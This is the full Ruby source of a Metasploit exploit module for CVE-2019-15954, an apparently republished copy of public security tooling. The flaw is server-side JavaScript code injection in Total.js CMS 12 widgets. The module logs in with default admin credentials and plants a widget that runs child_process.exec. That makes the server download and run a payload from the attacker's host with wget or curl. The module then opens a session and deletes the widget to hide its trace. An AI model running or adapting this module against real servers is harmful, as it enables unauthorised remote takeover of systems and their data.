Share
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::EXE  
include Msf::Exploit::CmdStager  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'Total.js CMS 12 Widget JavaScript Code Injection',  
'Description' => %q{  
This module exploits a vulnerability in Total.js CMS. The issue is that a user with  
admin permission can embed a malicious JavaScript payload in a widget, which is  
evaluated server side, and gain remote code execution.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Riccardo Krauter', # Original discovery  
'sinn3r' # Metasploit module  
],  
'Arch' => [ARCH_X86, ARCH_X64],  
'Targets' =>  
[  
[ 'Total.js CMS on Linux', { 'Platform' => 'linux', 'CmdStagerFlavor' => 'wget'} ],  
[ 'Total.js CMS on Mac', { 'Platform' => 'osx', 'CmdStagerFlavor' => 'curl' } ]  
],  
'References' =>  
[  
['CVE', '2019-15954'],  
['URL', 'https://seclists.org/fulldisclosure/2019/Sep/5'],  
['URL', 'https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf']  
],  
'DefaultOptions' =>  
{  
'RPORT' => 8000,  
},  
'Notes' =>  
{  
'SideEffects' => [ IOC_IN_LOGS ],  
'Reliability' => [ REPEATABLE_SESSION ],  
'Stability' => [ CRASH_SAFE ]  
},  
'Privileged' => false,  
'DisclosureDate' => '2019-08-30', # Reported to seclist  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The base path for Total.js CMS', '/']),  
OptString.new('TOTALJSUSERNAME', [true, 'The username for Total.js admin', 'admin']),  
OptString.new('TOTALJSPASSWORD', [true, 'The password for Total.js admin', 'admin'])  
])  
end  
  
class AdminToken  
attr_reader :token  
  
def initialize(cookie)  
@token = cookie.scan(/__admin=([a-zA-Z\d]+);/).flatten.first  
end  
  
def blank?  
token.blank?  
end  
end  
  
class Widget  
attr_reader :name  
attr_reader :category  
attr_reader :source_code  
attr_reader :platform  
attr_reader :url  
  
def initialize(p, u, stager)  
@name = "p_#{Rex::Text.rand_text_alpha(10)}"  
@category = 'content'  
@platform = p  
@url = u  
@source_code = %Q|<script total>|  
@source_code << %Q|global.process.mainModule.require('child_process')|  
@source_code << %Q|.exec("sleep 2;#{stager}");|  
@source_code << %Q|</script>|  
end  
end  
  
def check  
code = CheckCode::Safe  
  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'admin', 'widgets')  
})  
  
unless res  
vprint_error('Connection timed out')  
return CheckCode::Unknown  
end  
  
# If the admin's login page is visited too many times, we will start getting  
# a 401 (unauthorized response). In that case, we only have a header to work  
# with.  
if res.headers['X-Powered-By'].to_s == 'Total.js'  
code = CheckCode::Detected  
end  
  
# If we are here, then that means we can still see the login page.  
# Let's see if we can extract a version.  
html = res.get_html_document  
element = html.at('title')  
return code unless element.respond_to?(:text)  
title = element.text.scan(/CMS v([\d\.]+)/).flatten.first  
return code unless title  
version = Gem::Version.new(title)  
  
if version <= Gem::Version.new('12')  
# If we are able to check the version, we could try the default cred and attempt  
# to execute malicious code and see how the application responds. However, this  
# seems to a bit too aggressive so I'll leave that to the exploit part.  
return CheckCode::Appears  
end  
  
CheckCode::Safe  
end  
  
def auth(user, pass)  
json_body = { 'name' => user, 'password' => pass }.to_json  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri, 'api', 'login', 'admin'),  
'ctype' => 'application/json',  
'data' => json_body  
})  
  
unless res  
fail_with(Failure::Unknown, 'Connection timed out')  
end  
  
json_res = res.get_json_document  
cookies = res.get_cookies  
# If it's an array it could be an error, so we are specifically looking for a hash.  
if json_res.kind_of?(Hash) && json_res['success']  
token = AdminToken.new(cookies)  
@admin_token = token  
return token  
end  
fail_with(Failure::NoAccess, 'Invalid username or password')  
end  
  
def create_widget(admin_token)  
platform = target.platform.names.first  
host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket::source_address : datastore['SRVHOST']  
port = datastore['SRVPORT']  
proto = datastore['SSL'] ? 'https' : 'http'  
payload_name = "p_#{Rex::Text.rand_text_alpha(5)}"  
url = "#{proto}://#{host}:#{port}#{get_resource}/#{payload_name}"  
widget = Widget.new(platform, url, generate_cmdstager(  
'Path' => "#{get_resource}/#{payload_name}",  
'temp' => '/tmp',  
'file' => payload_name  
).join(';'))  
  
json_body = {  
'name' => widget.name,  
'category' => widget.category,  
'body' => widget.source_code  
}.to_json  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),  
'cookie' => "__admin=#{admin_token.token}",  
'ctype' => 'application/json',  
'data' => json_body  
})  
  
unless res  
fail_with(Failure::Unknown, 'Connection timed out')  
end  
  
res_json = res.get_json_document  
if res_json.kind_of?(Hash) && res_json['success']  
print_good("Widget created successfully")  
else  
fail_with(Failure::Unknown, 'No success message in body')  
end  
  
widget  
end  
  
def get_widget_item(admin_token, widget)  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),  
'cookie' => "__admin=#{admin_token.token}",  
'ctype' => 'application/json'  
})  
  
unless res  
fail_with(Failure::Unknown, 'Connection timed out')  
end  
  
res_json = res.get_json_document  
count = res_json['count']  
items = res_json['items']  
  
unless count  
fail_with(Failure::Unknown, 'No count key found in body')  
end  
  
unless items  
fail_with(Failure::Unknown, 'No items key found in body')  
end  
  
items.each do |item|  
widget_name = item['name']  
if widget_name.match(/p_/)  
return item  
end  
end  
  
[]  
end  
  
def clear_widget  
admin_token = get_admin_token  
widget = get_widget  
  
print_status('Finding the payload from the widget list...')  
item = get_widget_item(admin_token, widget)  
  
json_body = {  
'id' => item['id'],  
'picture' => item['picture'],  
'name' => item['name'],  
'icon' => item['icon'],  
'category' => item['category'],  
'datecreated' => item['datecreated'],  
'reference' => item['reference']  
}.to_json  
  
res = send_request_cgi({  
'method' => 'DELETE',  
'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),  
'cookie' => "__admin=#{admin_token.token}",  
'ctype' => 'application/json',  
'data' => json_body  
})  
  
unless res  
fail_with(Failure::Unknown, 'Connection timed out')  
end  
  
res_json = res.get_json_document  
if res_json.kind_of?(Hash) && res_json['success']  
print_good("Widget cleared successfully")  
else  
fail_with(Failure::Unknown, 'No success message in body')  
end  
end  
  
def on_request_uri(cli, req)  
print_status("#{cli.peerhost} requesting: #{req.uri}")  
  
if req.uri =~ /p_.+/  
payload_exe = generate_payload_exe(code: payload.encoded)  
print_status("Sending payload to #{cli.peerhost}")  
send_response(cli, payload_exe, {'Content-Type' => 'application/octet-stream'})  
return  
end  
  
send_not_found(cli)  
end  
  
def on_new_session(session)  
clear_widget  
end  
  
# This is kind of for cleaning up the wiget, because we cannot pass it as an  
# argument in on_new_session.  
def get_widget  
@widget  
end  
  
# This is also kind of for cleaning up widget, because we cannot pass it as an  
# argument directly  
def get_admin_token  
@admin_token  
end  
  
def exploit  
user = datastore['TOTALJSUSERNAME']  
pass = datastore['TOTALJSPASSWORD']  
print_status("Attempting to authenticate with #{user}:#{pass}")  
admin_token = auth(user, pass)  
fail_with(Failure::Unknown, 'No admin token found') if admin_token.blank?  
print_good("Authenticatd as: #{user}:#{pass}")  
print_status("Creating a widget...")  
@widget = create_widget(admin_token)  
super  
end  
  
end